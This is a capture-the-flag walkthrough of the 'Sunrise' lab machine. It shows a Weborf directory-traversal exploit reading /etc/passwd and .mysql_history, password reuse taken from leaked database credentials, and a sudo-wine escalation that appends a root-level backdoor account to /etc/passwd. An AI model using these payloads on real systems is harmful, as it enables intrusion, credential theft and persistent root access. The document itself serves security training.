Port recognition withnmap

┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 sunrise.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-29 12:50 EST
Scanning sunrise.vuln (10.0.2.63) [65535 ports]
Discovered open port 8080/tcp on 10.0.2.63
Discovered open port 22/tcp on 10.0.2.63
Discovered open port 3306/tcp on 10.0.2.63
Discovered open port 80/tcp on 10.0.2.63
Completed SYN Stealth Scan at 12:50, 1.47s elapsed (65535 total ports)
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp   open  http       nginx 1.14.2
3306/tcp open  mysql?
8080/tcp open  http-proxy Weborf (GNU/Linux)
┌──(root@ghost)-[/home/ghost]
└─# whatweb http://sunrise.vuln:8080
http://sunrise.vuln:8080 [200 OK] Country[RESERVED][ZZ], HTTPServer[Linux][Weborf (GNU/Linux)], IP[10.0.2.63], Title[Weborf]

Visit http://sunrise.vuln:8080 and you will see 'Generated by Weborf/0.12.2 (GNU/Linux)'

┌──(root@ghost)-[/home/ghost]
└─# searchsploit weborf
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
weborf 0.12.2 - Directory Traversal                                                                                                                               | linux/remote/14925.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/linux/remote/14925.txt
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Out
┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
uuidd:x:111:120::/run/uuidd:/usr/sbin/nologin
rtkit:x:112:121:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pulse:x:114:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
geoclue:x:116:124::/var/lib/geoclue:/usr/sbin/nologin
tss:x:117:125:TPM2 software stack,,,:/var/lib/tpm:/bin/false
speech-dispatcher:x:118:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:120:127:Light Display Manager:/var/lib/lightdm:/bin/false
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false

We can list files and see indexed folders if we use our browser

┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
a6050aecf6303b0b824038807d823a89

From here we can obtain user's flag

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 -w /usr/share/dirb/wordlists/common.txt -u "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   200        2 L      18 W       439 Ch      "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f"                                                     
000000003:   200        113 L    483 W      3526 Ch     ".bashrc"                                                                                                                          
000000016:   200        2 L      8 W        83 Ch       ".mysql_history"                                                                                                                   
000000019:   200        27 L     130 W      807 Ch      ".profile"

After fuzzing a lot directories we found .mysql_history file

┌──(root@ghost)-[/home/ghost]
└─# curl "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history"
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

Found credentials for mysql local database, maybe weborf reuse password for ssh

┌──(root@ghost)-[/home/ghost]
└─# ssh weborf@sunrise.vuln
weborf@sunrise.vuln's password: 
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec  5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$ 

We are as weborf user now

┌──(root@ghost)-[/home/ghost]
└─# mysql mysql -u weborf -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> select User,Password from mysql.user;
+---------+-------------------------------------------+
| User    | Password                                  |
+---------+-------------------------------------------+
| root    | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades       |
| weborf  | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+

After checking the whole database we found sunrise user and password in clear text

weborf@sunrise:~$ su sunrise
Password: 
sunrise@sunrise:/home/weborf$

And we can pivot to sunrise user

sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise: 
Matching Defaults entries for sunrise on sunrise:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunrise may run the following commands on sunrise:
    (root) /usr/bin/wine

We can see that sunrise can execute /usr/bin/wine as root user

sunrise@sunrise:/home/weborf$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)

Z:\home\weborf>type Z:\root\root.txt
            ^^                   @@@@@@@@@
       ^^       ^^            @@@@@@@@@@@@@@@
                            @@@@@@@@@@@@@@@@@@              ^^
                           @@@@@@@@@@@@@@@@@@@@
 ~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
 ~         ~~   ~  ~       ~~~~~~~~~~~~~~~~~~~~ ~       ~~     ~~ ~
   ~      ~~      ~~ ~~ ~~  ~~~~~~~~~~~~~ ~~~~  ~     ~~~    ~ ~~~  ~ ~~
   ~  ~~     ~         ~      ~~~~~~  ~~ ~~~       ~~ ~ ~~  ~~ ~
 ~  ~       ~ ~      ~           ~~ ~~~~~~  ~      ~~  ~             ~~
       ~             ~        ~      ~      ~~   ~             ~

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

24edb59d21c273c033aa6f1689b0b18c

And here root flag

To get out of wine context taking root privileges advantage we can abuse from /etc/passwd

┌──(root@ghost)-[/home/ghost]
└─# openssl passwd -1 -salt ghost root
$1$ghost$hei4EuMz/wBkKFXDT2bQT0

Generating password

┌──(root@ghost)-[/home/ghost]
└─# cat gowcroot.bat
echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd

Wine payload

sunrise@sunrise:~$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)

Z:\home\sunrise>echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd

Z:\home\sunrise>exit
sunrise@sunrise:~$ su ghost
Password: 
root@sunrise:/home/sunrise#

And we are root